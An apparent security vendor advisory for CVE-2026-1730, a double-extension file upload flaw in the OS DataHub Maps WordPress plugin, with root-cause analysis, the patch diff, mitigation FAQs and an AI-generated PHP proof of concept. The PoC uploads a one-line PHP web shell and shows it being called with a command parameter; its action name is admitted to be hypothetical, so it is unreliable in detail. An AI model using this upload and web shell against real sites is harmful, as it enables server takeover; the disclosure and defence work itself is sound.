What is CVE-2026-1730?

CVE-2026-1730 is a high-severity vulnerability in the OS DataHub Maps plugin for WordPress, affecting versions up to and including 1.8.3. It allows authenticated users with Author-level access or higher to upload arbitrary files due to improper file type validation.

How does the vulnerability work?

The vulnerability arises from insufficient validation of file types in the ‘add_file_and_ext’ function. Attackers can exploit this by uploading files with double extensions, such as ‘malicious.php.jpg’, which bypasses the validation checks and allows execution of arbitrary PHP code.

Who is affected by this vulnerability?

Any WordPress site using the OS DataHub Maps plugin version 1.8.3 or earlier is vulnerable. Specifically, authenticated users with Author-level permissions or higher can exploit this flaw.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the OS DataHub Maps plugin installed. If it is version 1.8.3 or earlier, your site is at risk. Additionally, you can review the plugin code for the presence of the vulnerable function.

How can I fix this vulnerability?

The vulnerability is patched in version 1.8.4 of the OS DataHub Maps plugin. Updating to this version or later will mitigate the issue. Always ensure to back up your site before performing updates.

What does the CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity level, meaning the vulnerability poses a significant risk to affected systems. It suggests that exploitation could lead to serious consequences, including remote code execution.

What practical risks does this vulnerability pose?

If exploited, an attacker could upload malicious files, leading to remote code execution. This could allow them to take full control of the server, create unauthorized users, deface the site, or exfiltrate sensitive data.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can authenticate to a vulnerable WordPress site and upload a malicious file using a crafted HTTP request. It highlights the steps required to bypass the file validation and execute arbitrary code.

How can I mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider restricting access to the WordPress admin area, monitoring file uploads closely, and implementing security plugins that can block malicious file types until the plugin can be updated.

What are the best practices for securing WordPress plugins?

To secure WordPress plugins, regularly update them to the latest versions, review plugin code for vulnerabilities, limit user permissions, and use security plugins that provide additional layers of protection against common threats.

How can I stay informed about vulnerabilities like CVE-2026-1730?

Stay informed by following security advisories from the WordPress security team, subscribing to vulnerability databases like NVD, and monitoring security blogs and forums that focus on WordPress and web application security.

Is it safe to use the OS DataHub Maps plugin after the patch?

Yes, after updating to version 1.8.4 or later, the OS DataHub Maps plugin should be safe to use. However, it is essential to remain vigilant and monitor for any new vulnerabilities in the future.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1730: OS DataHub Maps <= 1.8.3 – Authenticated (Author+) Arbitrary File Upload (os-datahub-maps)

CVE ID CVE-2026-1730

Plugin os-datahub-maps

Severity High (CVSS 8.8)

CWE 434

Vulnerable Version 1.8.3

Patched Version 1.8.4

Disclosed February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1730:
The OS DataHub Maps WordPress plugin, versions up to and including 1.8.3, contains an arbitrary file upload vulnerability. The flaw exists in the plugin’s file upload validation logic, allowing authenticated attackers with Author-level privileges or higher to upload malicious files, potentially leading to remote code execution. The CVSS score of 8.8 reflects the high severity of this issue.

The root cause is insufficient file type validation in the `OS_DataHub_Maps_Admin::add_file_and_ext` function within the file `os-datahub-maps/include/osmap-admin.php`. The vulnerable code iterated through a list of allowed MIME types and performed a simple `stripos` check on the full filename for the extension string. This allowed an attacker to bypass the check by using a filename like `malicious.php.jpg`, where the `.jpg` substring would match, but the actual file extension parsed by the server would be `.php`. The function incorrectly validated the file based on this substring match.

Exploitation requires an attacker to have an Author-level WordPress account. The attacker would target the plugin’s file upload functionality, which is likely exposed via an AJAX handler or admin interface. The payload would be a crafted HTTP POST request containing a malicious file (e.g., a PHP web shell). The filename would embed a double extension, such as `shell.php.jpg`, to pass the plugin’s flawed validation. The server would then save the file with the `.php` extension, making it executable within the web root.

The patch modifies the `add_file_and_ext` function. It introduces a call to `pathinfo($filename, PATHINFO_EXTENSION)` to accurately extract the file’s true extension. This value is then converted to lowercase and compared for an exact match (`$file_ext === $ext`) against the keys in the `$this->additional_mime_types` array. This change ensures validation occurs on the actual file extension, not a substring within the full filename, effectively closing the bypass. The patch also includes additional array validation in `osmap-shortcode.php` for defense in depth.

Successful exploitation grants an attacker the ability to upload arbitrary files, including PHP scripts, to the WordPress server. This leads directly to remote code execution with the privileges of the web server process. An attacker can fully compromise the host, create administrative users, deface the site, exfiltrate data, or use the server as a pivot point within the network.

Differential between vulnerable and patched code

Code Diff

--- a/os-datahub-maps/include/osmap-admin.php
+++ b/os-datahub-maps/include/osmap-admin.php
@@ -63,11 +63,15 @@
      * Also add file extension checks for these file types.
      */
     public function add_file_and_ext( $types, $file, $filename, $mimes ) {
-        foreach ( $this->additional_mime_types as $ext => $mime ) {
-            if ( false !== stripos( $filename, '.' . $ext ) ) {
-                $types['ext'] = $ext;
-                $types['type'] = $mime;
-                $types['proper_filename'] = $filename;
+        $file_ext = pathinfo( $filename, PATHINFO_EXTENSION );
+        if ( $file_ext !== null ) {
+            $file_ext = strtolower( $file_ext );
+            foreach ( $this->additional_mime_types as $ext => $mime ) {
+                if ( $file_ext === $ext ) {
+                    $types['ext'] = $ext;
+                    $types['type'] = $mime;
+                    $types['proper_filename'] = $filename;
+                }
             }
         }

--- a/os-datahub-maps/include/osmap-shortcode.php
+++ b/os-datahub-maps/include/osmap-shortcode.php
@@ -232,7 +232,7 @@
                 $json = $this->get_file_content( $file_arg, true );
                 if ( $json ) {
                     $decode = json_decode( $json, true, 4 );
-                    if ( $decode !== null ) {
+                    if ( ( $decode !== null ) && ( is_array( $decode ) ) && ( is_array( $decode[0] ) ) ) {
                         // Ensure we have the minimum required data.
                         foreach ( $decode as $item ) {
                             $clean = $this->sanitise_specifier( $item, $is_url );
--- a/os-datahub-maps/os-datahub-maps.php
+++ b/os-datahub-maps/os-datahub-maps.php
@@ -4,7 +4,7 @@
  * Plugin Name:       OS DataHub Maps
  * Plugin URI:        https://skirridsystems.co.uk/os-datahub-maps/
  * Description:       Plugin for displaying OS Maps using the Data Hub Maps API.
- * Version:           1.8.3
+ * Version:           1.8.4
  * Author:            Simon Large
  * Author             URI: https://skirridsystems.co.uk/
  * License:           GPL-2.0+
@@ -19,7 +19,7 @@
 /**
  * Plugin version used for cache busting
  */
-define( 'OS_DATAHUB_MAPS_VERSION', '1.8.3' );
+define( 'OS_DATAHUB_MAPS_VERSION', '1.8.4' );

 /**
  * This code runs when the plugin is activated.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1730 - OS DataHub Maps <= 1.8.3 - Authenticated (Author+) Arbitrary File Upload
<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'author_user';
$password = 'author_pass';

// 1. Authenticate to WordPress to obtain cookies and nonce
$login_url = str_replace('admin-ajax.php', 'admin-post.php?action=login', $target_url);
// Note: Actual authentication requires a full WordPress login flow (wp-login.php, nonce).
// This PoC skeleton assumes the attacker has already obtained a valid session.
// A full exploit would require implementing the WordPress login sequence.

// 2. Craft the malicious upload request
// The exact action parameter for the plugin's upload handler must be identified.
// This is a template using a common WordPress AJAX pattern.
$ch = curl_init();
$post_fields = [
    'action' => 'os_datahub_maps_upload', // Hypothetical action name; needs verification
    'nonce' => 'VALID_NONCE_HERE', // Requires a valid nonce from the admin page
    'file_upload' => new CURLFile('shell.php.jpg', 'image/jpeg', 'shell.php.jpg')
];

// File shell.php.jpg contents: <?php echo system($_GET['cmd']); ?>
// The file has a .jpg extension in the POST data but contains PHP code.
// The vulnerable validation sees '.jpg' in the filename and allows it.
// The server saves it as 'shell.php.jpg' but may execute it as PHP.

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_fields,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIE => 'wordpress_logged_in_abc=...', // Authenticated session cookie
    CURLOPT_HEADER => true,
]);

$response = curl_exec($ch);
curl_close($ch);

// 3. If successful, the uploaded file path would be in the response.
// The attacker can then access http://vulnerable-site.com/wp-content/uploads/shell.php.jpg?cmd=id

echo "Check response for upload success and file location.n";

?>

Frequently Asked Questions

What is CVE-2026-1730?
Overview of the vulnerability
CVE-2026-1730 is a high-severity vulnerability in the OS DataHub Maps plugin for WordPress, affecting versions up to and including 1.8.3. It allows authenticated users with Author-level access or higher to upload arbitrary files due to improper file type validation.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient validation of file types in the ‘add_file_and_ext’ function. Attackers can exploit this by uploading files with double extensions, such as ‘malicious.php.jpg’, which bypasses the validation checks and allows execution of arbitrary PHP code.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the OS DataHub Maps plugin version 1.8.3 or earlier is vulnerable. Specifically, authenticated users with Author-level permissions or higher can exploit this flaw.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the OS DataHub Maps plugin installed. If it is version 1.8.3 or earlier, your site is at risk. Additionally, you can review the plugin code for the presence of the vulnerable function.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 1.8.4 of the OS DataHub Maps plugin. Updating to this version or later will mitigate the issue. Always ensure to back up your site before performing updates.
What does the CVSS score of 8.8 indicate?
Understanding severity levels
A CVSS score of 8.8 indicates a high severity level, meaning the vulnerability poses a significant risk to affected systems. It suggests that exploitation could lead to serious consequences, including remote code execution.
What practical risks does this vulnerability pose?
Potential impact on affected sites
If exploited, an attacker could upload malicious files, leading to remote code execution. This could allow them to take full control of the server, create unauthorized users, deface the site, or exfiltrate sensitive data.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can authenticate to a vulnerable WordPress site and upload a malicious file using a crafted HTTP request. It highlights the steps required to bypass the file validation and execute arbitrary code.
How can I mitigate the risk if I cannot update immediately?
Temporary measures
If immediate updating is not possible, consider restricting access to the WordPress admin area, monitoring file uploads closely, and implementing security plugins that can block malicious file types until the plugin can be updated.
What are the best practices for securing WordPress plugins?
General security recommendations
To secure WordPress plugins, regularly update them to the latest versions, review plugin code for vulnerabilities, limit user permissions, and use security plugins that provide additional layers of protection against common threats.
How can I stay informed about vulnerabilities like CVE-2026-1730?
Sources for security updates
Stay informed by following security advisories from the WordPress security team, subscribing to vulnerability databases like NVD, and monitoring security blogs and forums that focus on WordPress and web application security.
Is it safe to use the OS DataHub Maps plugin after the patch?
Evaluating post-patch security
Yes, after updating to version 1.8.4 or later, the OS DataHub Maps plugin should be safe to use. However, it is essential to remain vigilant and monitor for any new vulnerabilities in the future.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations